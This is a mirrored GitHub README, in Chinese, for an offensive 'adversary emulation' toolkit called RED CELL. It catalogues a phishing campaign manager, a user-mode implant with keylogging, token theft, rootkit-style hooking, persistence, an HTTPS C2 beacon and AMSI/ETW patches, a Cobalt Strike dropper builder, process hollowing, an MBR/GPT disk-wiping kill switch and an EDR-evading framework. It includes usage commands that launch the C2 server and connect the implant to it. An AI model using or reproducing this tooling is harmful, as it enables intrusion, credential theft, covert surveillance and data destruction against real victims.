cwill-telecom/Red-Cell

GitHub: cwill-telecom/Red-Cell

RED CELL 是一套覆盖钓鱼、植入、C2、载荷生成和反取证全链路的红队对手模拟工具包。

Stars: 0 | Forks: 0

# RED CELL ![RED CELL](https://static.pigsec.cn/wp-content/uploads/repos/cas/04/04b0ed311977b69987df800a9e7a42e89868165b793f62108fae8fb8a9b59798.gif) 对手模拟工具包。包括 Implant、payload 生成器、钓鱼基础设施、磁盘镜像工具、kill switch 以及作战框架。 ## 清单 ### Implant 与 Agent | 文件 | 类型 | 用途 | |------|------|---------| | `redphish.py` | Python | 钓鱼活动管理器 — SMTP 轮换、打开/点击跟踪、4 个 HTML 模板、Flask 跟踪服务器、SQLite 分析 | | | Python | | | `wraith.zip` | 归档 | 用户态 implant — inline hooking 引擎(C++ DLL)、token 窃取、键盘记录器、持久化、C2 beacon、Flask 面板 | | `asm_C2_experimental/` | 目录 | 汇编级 C2 实验 — 手写 shellcode 存根、自定义协议实现、syscall 级 beaconing | ### Payload 与投递 | 文件 | 类型 | 用途 | |------|------|---------| | `generate_msbuild_payload.py` | Python | 通过 Donut 生成 MSBuild inline-task XML 生成器 — 使用 VirtualAlloc + CreateThread 将 EXE/DLL 转换为 LOLBin payload | | `dropper_builder.py` | Python | 用于构建 Cobalt Strike dropper 的 Tkinter GUI — 配置监听器主机/端口、打包 payload | | `process-hollowing1.zip` | 归档 | 进程镂空实现 — 创建挂起进程、取消映射、写入 shellcode、恢复运行 | ### Kill Switch 与反取证 | 文件 | 类型 | 用途 | |------|------|---------| | `killswitch.zip` | 归档 | 磁盘 + 文件 kill switch — MBR/GPT 覆盖(`0xCC`)、删除时进行文件粉碎(多通道:`0xCC` → `0x00` → `0xAA` → 随机) | | `disk_imager.zip` | 归档 | 块级磁盘镜像工具 — 原始设备读取、zlib 压缩、TCP 流式传输、隐身模式 | ### 框架与参考 | 文件 | 类型 | 用途 | |------|------|---------| | `RedCell/` | 目录 | Red Cell 作战框架 — TTP 矩阵、交战工作流 | | `RedTeam-Framework.zip` | 归档 | 通用红队工具 — 侦察、横向移动、数据外发工具 | | `apt_tradecraft_operatonal.zip` | 归档 | 集成模块化框架 — C2 服务器、payload 构建器、规避基础设施、kill chain 流水线。完整的程序,而不仅仅是参考资料。 | | `py_to_exe.txt` | 笔记 | 将 Python 工具编译为独立 Windows 可执行文件的指南 | ## 工具详情 ### `redphish.py` 专业的钓鱼活动管理器。具备多账户轮换的 SMTP 投递、打开跟踪(1×1 像素)、点击跟踪(重定向日志记录)、SQLite 活动数据库、内置 HTML 模板(Microsoft 365、Secure Update、Secure Document、Financial Review)、SPF/DKIM/DMARC DNS 检查器、CSV 导出、交互式 TUI 和无头 CLI。 ``` python redphish.py # interactive menu python redphish.py --test --target user@corp.com python redphish.py --tracking-server --port 8080 ``` ### `generate_msbuild_payload.py` 通过 Donut shellcode 将 EXE 或 DLL 转换为 MSBuild inline-task XML。自动检测 PE 架构以获取正确的 `Framework64` 路径。`WaitForSingleObject` 保持 MSBuild 处于活动状态,直到 shellcode 退出。 ``` python generate_msbuild_payload.py beacon.exe -o payload.xml python generate_msbuild_payload.py beacon.dll --dll -c Run msbuild payload.xml ``` ### `dropper_builder.py` 用于将 CS beacon 打包进 dropper 的 GUI 工具。配置监听器,可选择捆绑 EXE,并生成最终的可执行文件。 ``` python dropper_builder.py ``` ### `wraith.zip` 具有原生 C++ hooking DLL 的全功能用户态 implant: - **Inline hooking** — 通过 14 字节 x64 跳板(`NtQuerySystemInformation`、`NtQueryDirectoryFile`、`NtEnumerateKey`)隐藏进程/文件/注册表 - **Token 窃取** — SeDebugPrivilege → 查找 winlogon PID → DuplicateTokenEx → ImpersonateLoggedOnUser - **键盘记录器** — 通过 ctypes 使用 `WH_KEYBOARD_LL` 进行底层捕获,并跟踪窗口标题 - **持久化** — 计划任务 + 注册表 Run + WMI 订阅 - **C2** — 带有 XOR 加密 + jitter 的 HTTPS beacon,以及具有实时 Agent 管理功能的 Flask 面板 - **ETW/AMSI 补丁** — `EtwEventWrite` → `ret`, `AmsiScanBuffer` → `xor eax, eax; ret` ``` unzip wraith.zip && cd wraith pip install -r requirements.txt python c2_server.py --port 8443 python wraith.py --c2 https://IP:8443 ``` ### `killswitch.zip` 双层破坏: - `killswitch.cpp` — 物理磁盘擦除。使用 `0xCC` 覆盖 MBR、GPT 和所有扇区。 - `filekill.cpp` / `filekill.py` — 文件级破坏。监控目录。当文件被删除时,系统范围内所有的副本都会被多通道粉碎并删除。 ### `disk_imager.zip` ### `apt_tradecraft_operatonal.zip` 集成模块化框架 — 不是参考文档,而是功能完备的程序: - **C2 服务器** — 用于 Agent 管理的命令与控制基础设施 - **Payload 构建器** — 生成具备可配置规避功能、随时可部署的 implant - **规避基础设施** — 反分析、沙箱检测、EDR 绕过模块 - **Kill chain 流水线** — 从初始访问到数据外发的端到端工作流 解压并查看构建器和服务器组件以获取完整接口。 ### `asm_C2_experimental/` 使用汇编语言编写的底层 C2 实验: - 手写的 shellcode 存根,用于直接进行 syscall 调用 - 自定义协议实现 — 无库依赖,占用空间小 - Syscall 级 beaconing — 通过直接调用内核绕过用户态 hooking - 可用作构建位置无关 implant 组件的基础模块 ## 通用模式 **覆盖特征:** 工具统一使用 `0xCC`(INT 3 breakpoint)作为安全覆盖字节。 **构建链:** C++ 目标编译器为 MinGW-w64 (`x86_64-w64-mingw32-g++ -O2 -s -static`)。Python 需要 3.9+ 版本及各工具特定的依赖项。 **加密:** C2 流量使用 XOR(Wraith)或 RSA+AES-GCM 混合加密(高级 RAT)。钓鱼模板通过 HTTPS 重定向进行打开/点击跟踪。 **隐身标志:** 磁盘镜像工具上的 `--stealth` 标志会降低 I/O 优先级、隐藏控制台、重命名进程并清理 shell 历史记录。
标签:C2框架, IP 地址批量处理, macOS, 反取证, 嗅探欺骗, 子域名变形, 安全学习资源, 安全工具集合, 安全评估, 对手模拟, 权限维持, 网络信息收集, 自动回退, 载荷生成, 逆向工具